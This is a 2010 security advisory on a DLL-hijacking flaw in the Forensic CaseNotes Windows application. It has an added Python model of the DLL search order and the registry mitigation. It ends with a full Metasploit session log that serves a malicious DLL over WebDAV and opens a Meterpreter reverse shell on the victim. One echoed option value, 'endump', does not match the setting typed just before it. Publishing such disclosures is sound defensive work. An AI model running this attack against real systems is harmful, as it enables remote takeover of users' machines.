Advisory: Forensic CaseNotes - Insecure Library Loading Allows Remote Code Execution (DLL Hijacking)
- in a nutshell:
---------------------------------------------
Forensic CaseNotes - Insecure Library Loading Allows Remote Code Execution (DLL Hijacking)
Date: 29.08.2010
---------------------------------------------
- Forensic CaseNotes Description
CaseNotes is a single, lightweight application for the Microsoft Windows platform that lets forensic analysts and examiners of any discipline securely record their contemporaneous notes electronically.
- Insecure Library Loading Allows Remote Code Execution
This vulnerability was discovered using the Metasploit Framework's webdav_dll_hijacker module with the following option: "set EXTENSIONS notes"
For further vulnerability details, please check the links in the reference section.
- Affected Versions
1.0.2007.8/1.3.2010.6 - other releases may also be affected.
- Solution
It is not known if there are fixed releases available.
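The following Python model is added here as an illustration and is not part of the advisory or of CaseNotes: it replays the Windows DLL search order (SafeDllSearchMode enabled) to show why opening a .notes file from the WebDAV share makes the application pick up credssp.dll from that share, and how the CWDIllegalInDllSearch setting introduced with Microsoft advisory 2269637 (KB2264107) blocks that lookup. The directory contents, the application path and the assumption that credssp.dll is absent from the local search directories are constructed for the example.

```python
# Constructed model of the Windows DLL search order (not real loader code).
# Directory -> (kind, files). Kinds: "local", "smb", "webdav". The local
# directories deliberately lack credssp.dll so the lookup behaves as in the
# advisory's session, where the share was asked for /documents/credssp.dll.
FS = {
    r"C:\Program Files\CaseNotes": ("local", {"CaseNotes.exe"}),
    r"C:\Windows\System32": ("local", {"kernel32.dll", "user32.dll"}),
    r"C:\Windows\System": ("local", set()),
    r"C:\Windows": ("local", set()),
    r"\\10.8.28.9\documents": ("webdav", {"policy.notes", "credssp.dll"}),
}

APP_DIR = r"C:\Program Files\CaseNotes"          # assumed install path
SYSTEM_DIRS = [r"C:\Windows\System32", r"C:\Windows\System", r"C:\Windows"]

# CWDIllegalInDllSearch values (KB2264107): 0 = default behaviour,
# 1 = skip CWD when it is a WebDAV share, 2 = skip CWD when it is any remote
# location (WebDAV or UNC share), 0xFFFFFFFF = never search the CWD.
def cwd_is_searched(cwd, cwd_illegal):
    kind = FS[cwd][0]
    if cwd_illegal == 0xFFFFFFFF:
        return False
    if cwd_illegal == 2:
        return kind == "local"
    if cwd_illegal == 1:
        return kind != "webdav"
    return True

def resolve_dll(name, cwd, cwd_illegal=0, path_dirs=()):
    """Return the directory the loader would take `name` from, or None.

    Search order with SafeDllSearchMode on: application directory, the three
    system directories, the current working directory, then PATH entries.
    """
    order = [APP_DIR, *SYSTEM_DIRS]
    if cwd_is_searched(cwd, cwd_illegal):
        order.append(cwd)
    order.extend(path_dirs)
    for directory in order:
        if name in FS[directory][1]:
            return directory
    return None

if __name__ == "__main__":
    # Double-clicking policy.notes on the share makes the share the CWD.
    share = r"\\10.8.28.9\documents"
    print("default:  ", resolve_dll("credssp.dll", share))            # the share
    print("hardened: ", resolve_dll("credssp.dll", share, cwd_illegal=2))  # None
```

Setting the registry value to 2 or 0xFFFFFFFF is the system-wide mitigation the referenced Microsoft advisory describes; a per-application fix still has to stop the program from resolving the library through the current directory.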
- Credits
The vulnerability was discovered by m1k3 - m1k3#at#m1k3#dot#at
- Timeline
29.08.2010 - vulnerability discovered
29.08.2010 - public disclosure
- Reference
http://www.qccis.com/forensic-tools
http://www.microsoft.com/technet/security/advisory/2269637.mspx
http://www.exploit-db.com/dll-hijacking-vulnerable-applications/
http://blog.metasploit.com/2010/08/better-faster-stronger.html
http://www.metasploit.com/modules/exploit/windows/browser/webdav_dll_hij...
http://www.s3cur1ty.de/advisories
- Exploiting example:
msf exploit(webdav_dll_hijacker) > set EXTENSIONS notes
EXTENSIONS => endump
msf exploit(webdav_dll_hijacker) > show options
Module options:

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   BASENAME    policy           yes       The base name for the listed files.
   EXTENSIONS  notes            yes       The list of extensions to generate
   SHARENAME   documents        yes       The name of the top-level share.
   SRVHOST     10.8.28.9        yes       The local host to listen on.
   SRVPORT     80               yes       The daemon port to listen on (do not change)
   URIPATH     /                yes       The URI to use (do not change).

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process
   LHOST     10.8.28.9        yes       The listen address
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic
msf exploit(webdav_dll_hijacker) > exploit
[*] Exploit running as background job.
[*] Started reverse handler on 10.8.28.9:4444
[*]
[*] Exploit links are now available at \\10.8.28.9\documents\
[*]
[*] Using URL: http://10.8.28.9:80/
[*] Server started.
<snip>
[*] 10.8.28.55:49194 PROPFIND => 301 (/DOCUMENTS)
[*] 10.8.28.55:49194 PROPFIND /DOCUMENTS/
[*] 10.8.28.55:49194 PROPFIND => 207 Directory (/DOCUMENTS/)
[*] 10.8.28.55:49194 PROPFIND => 207 Top-Level Directory
[*] 10.8.28.55:49194 GET => DLL Payload
[*] 10.8.28.55:49194 PROPFIND /documents/credssp.dll
[*] 10.8.28.55:49194 PROPFIND => 207 File (/documents/credssp.dll)
[*] 10.8.28.55:49194 GET => DLL Payload
[*] 10.8.28.55:49194 PROPFIND /documents/rundll32.exe
[*] 10.8.28.55:49194 PROPFIND => 404 (/documents/rundll32.exe)
[*] Sending stage (748544 bytes) to 10.8.28.55
[*] Meterpreter session 2 opened (10.8.28.9:4444 -> 10.8.28.55:49200) at Sun Aug 29 20:43:39 +0200 2010
msf exploit(webdav_dll_hijacker) > sessions -i 2
[*] Starting interaction with 2...
meterpreter > getuid
Server username: m1k3-Vista\m1k3
